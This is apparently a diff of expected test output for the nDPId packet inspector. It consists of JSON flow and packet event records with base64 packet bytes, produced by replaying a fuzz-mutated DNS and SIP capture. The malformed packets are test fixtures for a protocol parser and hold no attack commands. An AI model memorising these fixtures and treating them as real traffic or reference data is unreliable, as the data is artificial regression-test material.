00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470784796} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470784796}
00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1003,19 +1003,19 @@
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1120470796802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470796802,"pkt":"AODtAW69ADBUADRWCABFiQBbAABAAEARtz7AqAEBwKgBAgA1Cu0ARzw7yxKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1120470796802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470796802,"pkt":"AODtAW69ADBUADRWCABFiQBbAABAAEARtz7AqAEBwKgBAgA1Cu0ARzw7yxKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00979{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":515,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"thread_ts_msec":1120470796802,"pkt":"ADBUADRWAODtAW69CABFAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00965{"packet_event_id":1,"packet_event_name":"packet","packet_id":515,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"thread_ts_msec":1120470796802,"pkt":"ADBUADRWAODtAW69CABFAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":515,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":474,"global_ts_msec":1120470796804} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":515,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":474,"global_ts_msec":1120470796804}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":180000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":180000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1120470796941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":524,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":524,"pkt_l4_len":490,"thread_ts_msec":1120470796941,"pkt":"AODtAW69ADBUADRWCABFAAH+AABAADcRii\/U8iEjwKgBAhPEE8QB6uoyU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMg0KQ1NlcTogMSBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MWI4OWJjZA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTAwLTA0MDcyLTE3MDFiOTQxLTc3OTk0NTg0Mw0iVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZWNlaXZlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmPYPWM5aEc0YktucCVzADc0Njg2LTQ1NWRiYmQ5MTkyLjE2OC4xLjINCldXYy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9uY2U9IjE3MDFiOTMzM2U4NzEzMmUxZjc0N2M1MDcyNjNkOTMiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG09TUQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1120470796941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":524,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":524,"pkt_l4_len":490,"thread_ts_msec":1120470796941,"pkt":"AODtAW69ADBUADRWCABFAAH+AABAADcRii\/U8iEjwKgBAhPEE8QB6uoyU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMg0KQ1NlcTogMSBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MWI4OWJjZA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTAwLTA0MDcyLTE3MDFiOTQxLTc3OTk0NTg0Mw0iVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZWNlaXZlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmPYPWM5aEc0YktucCVzADc0Njg2LTQ1NWRiYmQ5MTkyLjE2OC4xLjINCldXYy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9uY2U9IjE3MDFiOTMzM2U4NzEzMmUxZjc0N2M1MDcyNjNkOTMiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG09TUQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":180000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":180000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470796941,"pkt":"ADBUADRWAODtAW69CABFAACBa6MAAIARSyVzAAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXB0Y3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470796941,"pkt":"ADBUADRWAODtAW69CABFAACBa6MAAIARSyVzAAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXB0Y3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470797172} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470797172}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1120470798172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470798172,"pkt":"ADBUABRUAODtAW69CABFAABIa6QAAIARS63AqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1120470798172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470798172,"pkt":"ADBUABRUAODtAW69CABFAABIa6QAAIARS63AqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1120470800175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470800175,"pkt":"ADBUADRWAODtAW69CABFAABIa6UAAIARS6zAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1120470800175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470800175,"pkt":"ADBUADRWAODtAW69CABFAABIa6UAAIARS6zAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2167,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470800175,"pkt":"ADBUADRWAODtAW69CHdFAABIa6YAAIARS6vAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEXyVzAANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2167,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470800175,"pkt":"ADBUADRWAODtAW69CHdFAABIa6YAAIARS6vAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEXyVzAANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2167,"global_ts_msec":1120470802178} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2167,"global_ts_msec":1120470802178}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1120470806184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470806184,"pkt":"ADBUADRWAODtAW69CABFAABIa6cAAIARS6rAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1120470806184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470806184,"pkt":"ADBUADRWAODtAW69CABFAABIa6cAAIARS6rAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
